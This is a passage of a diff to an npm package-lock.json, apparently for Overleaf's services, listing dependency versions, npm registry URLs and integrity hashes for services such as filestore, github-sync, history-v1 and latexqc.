"@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": 
"https://opencollective.com/sinon" + } + }, + "services/docstore/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/document-updater": { + "name": "@overleaf/document-updater", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/ranges-tracker": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@types/chai-as-promised": "^7.1.8", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "express": "^4.21.2", + "lodash": "^4.17.21", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2", + "requestretry": "^7.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cluster-key-slot": "^1.0.5", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "^2.0.0", + "typescript": "^5.0.4" + } + }, + "services/filestore": { + "name": "@overleaf/filestore", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "glob": "^7.1.6", + "lodash.once": "^4.1.1", + "node-fetch": "^2.7.0", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mongodb": "6.12.0", + "sandboxed-module": "2.0.4", + "sinon": "9.0.2", + "sinon-chai": "^3.7.0", + "streamifier": "^0.1.1", + "typescript": "^5.0.4" + } + }, + "services/filestore/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/filestore/node_modules/sinon": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.2.tgz", + "integrity": "sha512-0uF8Q/QHkizNUmbK3LRFqx5cpTttEVXudywY9Uwzy8bTfZUhljZ7ARzSxnRHWYWtVTeh4Cw+tTb3iU21FQVO9A==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.0.3", + "diff": "^4.0.2", + "nise": "^4.0.1", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/filestore/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/freegeoip": { + "version": "1.0.0", + "license": "ISC", + "dependencies": { + "@maxmind/geoip2-node": "^5.0.0", + "@overleaf/fetch-utils": 
"*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "express": "^4.21.2", + "is-valid-hostname": "^1.0.2", + "tar-stream": "^2.2.0", + "zlib": "^1.0.5" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/github-sync": { + "name": "@overleaf/github-sync", + "dependencies": { + "@octokit/request": "^9.2.2", + "@overleaf/access-token-encryptor": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "base64-stream": "^0.1.2", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "lodash": "^4.17.21", + "mongodb-legacy": "6.1.3", + "octonode": "^0.9.5", + "p-limit": "^2.2.0", + "randomstring": "^1.1.5", + "request": "^2.88.2" + }, + "devDependencies": { + "@overleaf/fetch-utils": "*", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } + }, + "services/github-sync/node_modules/@octokit/endpoint": { + "version": "10.1.3", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-10.1.3.tgz", + "integrity": "sha512-nBRBMpKPhQUxCsQQeW+rCJ/OPSMcj3g0nfHn01zGYZXuNDvvXudF/TYY6APj5THlurerpFN4a/dQAIAaM6BYhA==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.6.2", + "universal-user-agent": "^7.0.2" + }, + "engines": { + "node": ">= 18" + } + }, + "services/github-sync/node_modules/@octokit/openapi-types": { + "version": "23.0.1", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-23.0.1.tgz", + "integrity": "sha512-izFjMJ1sir0jn0ldEKhZ7xegCTj/ObmEDlEfpFrx4k/JyZSMRHbO3/rBwgE7f3m2DHt+RrNGIVw4wSmwnm3t/g==", + "license": "MIT" + }, + "services/github-sync/node_modules/@octokit/request": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-9.2.2.tgz", + "integrity": "sha512-dZl0ZHx6gOQGcffgm1/Sf6JfEpmh34v3Af2Uci02vzUYz6qEN6zepoRtmybWXIGXFIK8K9ylE3b+duCWqhArtg==", + "license": "MIT", + "dependencies": { + "@octokit/endpoint": "^10.1.3", + "@octokit/request-error": "^6.1.7", + "@octokit/types": "^13.6.2", + "fast-content-type-parse": "^2.0.0", + "universal-user-agent": "^7.0.2" + }, + "engines": { + "node": ">= 18" + } + }, + "services/github-sync/node_modules/@octokit/request-error": { + "version": "6.1.7", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.7.tgz", + "integrity": "sha512-69NIppAwaauwZv6aOzb+VVLwt+0havz9GT5YplkeJv7fG7a40qpLt/yZKyiDxAhgz0EtgNdNcb96Z0u+Zyuy2g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.6.2" + }, + "engines": { + "node": ">= 18" + } + }, + "services/github-sync/node_modules/@octokit/types": { + "version": "13.8.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.8.0.tgz", + "integrity": "sha512-x7DjTIbEpEWXK99DMd01QfWy0hd5h4EN+Q7shkdKds3otGQP+oWE/y0A76i1OvH9fygo4ddvNf7ZvF0t78P98A==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^23.0.1" + } + }, + "services/github-sync/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + 
"engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/github-sync/node_modules/universal-user-agent": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-7.0.2.tgz", + "integrity": "sha512-0JCqzSKnStlRRQfCdowvqy3cy0Dvtlb8xecj/H8JFZuCze4rwjPZQOgvFvn0Ws/usCHQFGpyr+pB9adaGwXn4Q==", + "license": "ISC" + }, + "services/history-v1": { + "name": "overleaf-editor", + "version": "1.0.0", + "license": "Proprietary", + "dependencies": { + "@google-cloud/secret-manager": "^5.6.0", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "archiver": "^5.3.0", + "basic-auth": "^2.0.1", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bull": "^4.16.5", + "bunyan": "^1.8.12", + "check-types": "^11.1.2", + "command-line-args": "^3.0.3", + "config": "^1.19.0", + "express": "^4.21.2", + "fs-extra": "^9.0.1", + "generic-pool": "^2.1.1", + "helmet": "^3.22.0", + "http-status": "^1.4.2", + "jsonwebtoken": "^9.0.0", + "knex": "^2.4.0", + "lodash": "^4.17.19", + "mongodb": "6.12.0", + "overleaf-editor-core": "*", + "p-limit": "^6.2.0", + "pg": "^8.7.1", + "pg-query-stream": "^4.2.4", + "swagger-tools": "^0.10.4", + "temp": "^0.8.3", + "throng": "^4.0.0", + "tsscmp": "^1.0.6", + "utf-8-validate": "^5.0.4" + }, + "devDependencies": { + "benny": "^3.7.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-exclude": "^2.1.1", + "mocha": "^11.1.0", + "node-fetch": "^2.7.0", + "sinon": "^9.0.2", + "swagger-client": "^3.10.0", + "typescript": "^5.0.4", + "yauzl": "^2.9.1" + } + }, + "services/history-v1/node_modules/array-back": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-1.0.4.tgz", + "integrity": "sha1-ZEun8JX3/898Q7Xw3DnTwfA8Bjs=", + "dependencies": { + "typical": "^2.6.0" + }, + "engines": { + "node": ">=0.12.0" + } + }, + "services/history-v1/node_modules/bull": { + "version": "4.16.5", + "resolved": "https://registry.npmjs.org/bull/-/bull-4.16.5.tgz", + "integrity": "sha512-lDsx2BzkKe7gkCYiT5Acj02DpTwDznl/VNN7Psn7M3USPG7Vs/BaClZJJTAG+ufAR9++N1/NiUTdaFBWDIl5TQ==", + "license": "MIT", + "dependencies": { + "cron-parser": "^4.9.0", + "get-port": "^5.1.1", + "ioredis": "^5.3.2", + "lodash": "^4.17.21", + "msgpackr": "^1.11.2", + "semver": "^7.5.2", + "uuid": "^8.3.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/history-v1/node_modules/chai-exclude": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/chai-exclude/-/chai-exclude-2.1.1.tgz", + "integrity": "sha512-IHgNmgAFOkyRPnmOtZio9UsOHQ6RnzVr2LOs+5V9urYYqjhV/ERLQapC0Eq2DmID5eDWyngAcBxNUm0ZK0QbrQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "fclone": "^1.0.11" + }, + "peerDependencies": { + "chai": ">= 4.0.0 < 5" + } + }, + "services/history-v1/node_modules/check-types": { + "version": "11.1.2", + "resolved": "https://registry.npmjs.org/check-types/-/check-types-11.1.2.tgz", + "integrity": "sha512-tzWzvgePgLORb9/3a0YenggReLKAIb2owL03H2Xdoe5pKcUyWRSEQ8xfCar8t2SIAuEDwtmx2da1YB52YuHQMQ==" + }, + "services/history-v1/node_modules/command-line-args": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-3.0.5.tgz", + "integrity": "sha1-W9StReeYPlwTRJGOQCgO4mk8WsA=", + 
"dependencies": { + "array-back": "^1.0.4", + "feature-detect-es6": "^1.3.1", + "find-replace": "^1.0.2", + "typical": "^2.6.0" + }, + "bin": { + "command-line-args": "bin.js" + } + }, + "services/history-v1/node_modules/cron-parser": { + "version": "4.9.0", + "resolved": "https://registry.npmjs.org/cron-parser/-/cron-parser-4.9.0.tgz", + "integrity": "sha512-p0SaNjrHOnQeR8/VnfGbmg9te2kfyYSQ7Sc/j/6DtPL3JQvKxmjO9TSjNFpujqV3vEYYBvNNvXSxzyksBWAx1Q==", + "license": "MIT", + "dependencies": { + "luxon": "^3.2.1" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/history-v1/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "services/history-v1/node_modules/denque": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/denque/-/denque-2.1.0.tgz", + "integrity": "sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==", + "license": "Apache-2.0", + "engines": { + "node": ">=0.10" + } + }, + "services/history-v1/node_modules/find-replace": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-1.0.3.tgz", + "integrity": "sha1-uI5zZNLZyVlVnziMZmcNYTBEH6A=", + "dependencies": { + "array-back": "^1.0.4", + "test-value": "^2.1.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "services/history-v1/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "services/history-v1/node_modules/ioredis": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/ioredis/-/ioredis-5.5.0.tgz", + "integrity": "sha512-7CutT89g23FfSa8MDoIFs2GYYa0PaNiW/OrT+nRyjRXHDZd17HmIgy+reOQ/yhh72NznNjGuS8kbCAcA4Ro4mw==", + "license": "MIT", + "dependencies": { + "@ioredis/commands": "^1.1.1", + "cluster-key-slot": "^1.1.0", + "debug": "^4.3.4", + "denque": "^2.1.0", + "lodash.defaults": "^4.2.0", + "lodash.isarguments": "^3.1.0", + "redis-errors": "^1.2.0", + "redis-parser": "^3.0.0", + "standard-as-callback": "^2.1.0" + }, + "engines": { + "node": ">=12.22.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/ioredis" + } + }, + "services/history-v1/node_modules/p-limit": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-6.2.0.tgz", + "integrity": "sha512-kuUqqHNUqoIWp/c467RI4X6mmyuojY5jGutNU0wVTmEOOfcuwLqyMVoAi9MKi2Ak+5i9+nhmrK4ufZE8069kHA==", + "license": "MIT", + "dependencies": { + "yocto-queue": "^1.1.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/history-v1/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": 
{ + "node": ">=10" + } + }, + "services/history-v1/node_modules/test-value": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/test-value/-/test-value-2.1.0.tgz", + "integrity": "sha1-Edpv9nDzRxpztiXKTz/c97t0gpE=", + "dependencies": { + "array-back": "^1.0.3", + "typical": "^2.6.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "services/history-v1/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/history-v1/node_modules/yocto-queue": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.1.1.tgz", + "integrity": "sha512-b4JR1PFR10y1mKjhHY9LaGo6tmrgjit7hxVIeAmyMw3jegXR4dhYqLaQF5zMXZxY7tLpMyJeLjr1C4rLmkVe8g==", + "license": "MIT", + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/idp": { + "name": "@overleaf/idp", + "dependencies": { + "ejs": "^3.1.10", + "express": "^4.21.2", + "samlp": "^7.0.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/latexqc": { + "version": "0.0.1", + "license": "MIT", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/o-error": "*", + "aws-sdk": "^2.1174.0", + "body-parser": "^1.20.3", + "bootstrap": "^5.3.3", + "compression": "^1.7.1", + "cookie-parser": "^1.4.6", + "cross-env": "^4.0.0", + "es6-promise": "^4.2.8", + "express": "^4.21.2", + "express-basic-auth": "^1.2.0", + "express-flash": "0.0.2", + "express-rate-limit": "^2.11.0", + "helmet": "^7.1.0", + "jquery": "^3.7.1", + "jsonwebtoken": "^9.0.2", + "method-override": "^2.3.10", + "prop-types": "^15.8.1", + "react": "^17.0.2", + "react-cookie": "^7.2.0", + "react-dom": "^17.0.2", + "react-dropzone": "^14.2.3", + "react-helmet": "^6.1.0", + "react-redux": "^7.2.2", + "react-responsive": "^10.0.0", + "react-router-dom": "^6.26.1", + "redux": "^4.2.1", + "redux-logger": "^3.0.1", + "redux-thunk": "~2.2.0", + "source-map-support": "^0.5.12", + "throng": "^4.0.0" + }, + "devDependencies": { + "@babel/core": "^7.25.2", + "@babel/plugin-syntax-import-meta": "^7.10.4", + "@babel/plugin-transform-object-assign": "^7.22.5", + "@babel/plugin-transform-react-constant-elements": "^7.22.5", + "@babel/plugin-transform-react-inline-elements": "^7.22.5", + "@babel/polyfill": "^7.12.1", + "@babel/preset-env": "^7.25.3", + "@babel/preset-react": "^7.24.7", + "@babel/register": "^7.24.6", + "@testing-library/react": "^12.1.5", + "babel-loader": "^9.1.3", + "babel-plugin-react-transform": "^2.0.2", + "babel-plugin-transform-react-remove-prop-types": "^0.3.3", + "chai": "^4.3.10", + "chai-as-promised": "^7.1.1", + "css-loader": "^6.8.1", + "cssnano": "^6.0.0", + "eslint": "^7.21.0", + "eslint-config-prettier": "^8.5.0", + "eslint-config-standard": "^16.0.3", + "eslint-plugin-react": "^7.32.2", + "eslint-plugin-unicorn": "^56.0.0", + "expect": "^1.15.2", + "file-loader": "^6.2.0", + "jsdom": "^20.0.0", + "mini-css-extract-plugin": "^2.7.6", + "mocha": "^11.1.0", + "nodemon": "^3.0.1", + "postcss": "^8.4.31", + "postcss-import": "^15.1.0", + "postcss-loader": "^7.3.0", + "postcss-preset-env": "^8.3.2", + "postcss-reporter": "^7.0.5", + "react-transform-hmr": "^1.0.4", + "redux-mock-store": "1.5.0", + "sandboxed-module": "^2.0.4", + 
"sinon": "^19.0.2", + "sinon-chai": "^3.7.0", + "style-loader": "^3.3.3", + "url-loader": "^4.1.1", + "webpack": "^5.98.0", + "webpack-cli": "^5.1.4", + "webpack-dev-middleware": "^6.1.2", + "webpack-hot-middleware": "^2.25.1", + "webpack-manifest-plugin": "^5.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "services/latexqc/node_modules/@babel/code-frame": { + "version": "7.12.11", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.12.11.tgz", + "integrity": "sha512-Zt1yodBx1UcyiePMSkWnU4hPqhwq7hGi2nFL1LeA3EUl+q2LQx16MISgJ0+z7dnmgvP9QtIleuETGOiOH1RcIw==", + "dev": true, + "dependencies": { + "@babel/highlight": "^7.10.4" + } + }, + "services/latexqc/node_modules/@eslint/eslintrc": { + "version": "0.4.3", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-0.4.3.tgz", + "integrity": "sha512-J6KFFz5QCYUJq3pf0mjEcCJVERbzv71PUIDczuh9JkwGEzced6CO5ADLHB1rbf/+oPBtoPfMYNOpGDzCANlbXw==", + "dev": true, + "dependencies": { + "ajv": "^6.12.4", + "debug": "^4.1.1", + "espree": "^7.3.0", + "globals": "^13.9.0", + "ignore": "^4.0.6", + "import-fresh": "^3.2.1", + "js-yaml": "^3.13.1", + "minimatch": "^3.0.4", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "services/latexqc/node_modules/@humanwhocodes/config-array": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.5.0.tgz", + "integrity": "sha512-FagtKFz74XrTl7y6HCzQpwDfXP0yhxe9lHLD1UZxjvZIcbyRz8zTFF/yYNfSfzU414eDwZ1SrO0Qvtyf+wFMQg==", + "deprecated": "Use @eslint/config-array instead", + "dev": true, + "dependencies": { + "@humanwhocodes/object-schema": "^1.2.0", + "debug": "^4.1.1", + "minimatch": "^3.0.4" + }, + "engines": { + "node": ">=10.10.0" + } + }, + "services/latexqc/node_modules/@sinonjs/commons": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", + "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", + "dev": true, + "dependencies": { + "type-detect": "4.0.8" + } + }, + "services/latexqc/node_modules/@sinonjs/commons/node_modules/type-detect": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", + "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/@sinonjs/fake-timers": { + "version": "13.0.2", + "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-13.0.2.tgz", + "integrity": "sha512-4Bb+oqXZTSTZ1q27Izly9lv8B9dlV61CROxPiVtywwzv5SnytJqhvYe6FclHYuXml4cd1VHPo1zd5PmTeJozvA==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1" + } + }, + "services/latexqc/node_modules/@sinonjs/samsam": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/@sinonjs/samsam/-/samsam-8.0.2.tgz", + "integrity": "sha512-v46t/fwnhejRSFTGqbpn9u+LQ9xJDse10gNnPgAcxgdoCDMXj/G2asWAC/8Qs+BAZDicX+MNZouXT1A7c83kVw==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1", + "lodash.get": "^4.4.2", + "type-detect": "^4.1.0" + } + }, + "services/latexqc/node_modules/@sinonjs/text-encoding": { + "version": "0.7.3", + "resolved": "https://registry.npmjs.org/@sinonjs/text-encoding/-/text-encoding-0.7.3.tgz", + "integrity": "sha512-DE427ROAphMQzU4ENbliGYrBSYPXF+TtLg9S8vzeA+OF4ZKzoDdzfL8sxuMUGS/lgRhM6j1URSk9ghf7Xo1tyA==", + "dev": true + }, + 
"services/latexqc/node_modules/@types/hoist-non-react-statics": { + "version": "3.3.5", + "resolved": "https://registry.npmjs.org/@types/hoist-non-react-statics/-/hoist-non-react-statics-3.3.5.tgz", + "integrity": "sha512-SbcrWzkKBw2cdwRTwQAswfpB9g9LJWfjtUeW/jvNwbhC8cpmmNYVePa+ncbUe0rGTQ7G3Ff6mYUN2VMfLVr+Sg==", + "dependencies": { + "@types/react": "*", + "hoist-non-react-statics": "^3.3.0" + } + }, + "services/latexqc/node_modules/acorn-globals": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/acorn-globals/-/acorn-globals-7.0.1.tgz", + "integrity": "sha512-umOSDSDrfHbTNPuNpC2NSnnA3LUrqpevPb4T9jRx4MagXNS0rs+gwiTcAvqCRmsD6utzsrzNt+ebm00SNWiC3Q==", + "dev": true, + "dependencies": { + "acorn": "^8.1.0", + "acorn-walk": "^8.0.2" + } + }, + "services/latexqc/node_modules/acorn-globals/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/acorn-walk": { + "version": "8.3.3", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-8.3.3.tgz", + "integrity": "sha512-MxXdReSRhGO7VlFe1bRG/oI7/mdLV9B9JJT0N8vZOhF7gFRR5l3M8W9G8JxmKV+JC5mGqJ0QvqfSOLsCPa4nUw==", + "dev": true, + "dependencies": { + "acorn": "^8.11.0" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/acorn-walk/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "services/latexqc/node_modules/argparse": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dev": true, + "dependencies": { + "sprintf-js": "~1.0.2" + } + }, + "services/latexqc/node_modules/attr-accept": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/attr-accept/-/attr-accept-2.2.2.tgz", + "integrity": "sha512-7prDjvt9HmqiZ0cl5CRjtS84sEyhsHP2coDkaZKRKVfCDo9s7iw7ChVmar78Gu9pC4SoR/28wFu/G5JJhTnqEg==", + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/bootstrap": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/bootstrap/-/bootstrap-5.3.3.tgz", + "integrity": "sha512-8HLCdWgyoMguSO9o+aH+iuZ+aht+mzW0u3HIMzVu7Srrpv7EBBxTnrFlSCskwdY1+EOFQSm7uMJhNQHkdPcmjg==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/twbs" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/bootstrap" + } + ], + "license": "MIT", + "peerDependencies": { + "@popperjs/core": "^2.11.8" + } + }, + "services/latexqc/node_modules/chai": { + "version": "4.5.0", + 
"resolved": "https://registry.npmjs.org/chai/-/chai-4.5.0.tgz", + "integrity": "sha512-RITGBfijLkBddZvnn8jdqoTypxvqbOLYQkGGxXzeFjVHvudaPw0HNFD9x928/eUwYWd2dPCugVqspGALTZZQKw==", + "dev": true, + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.3", + "deep-eql": "^4.1.3", + "get-func-name": "^2.0.2", + "loupe": "^2.3.6", + "pathval": "^1.1.1", + "type-detect": "^4.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + 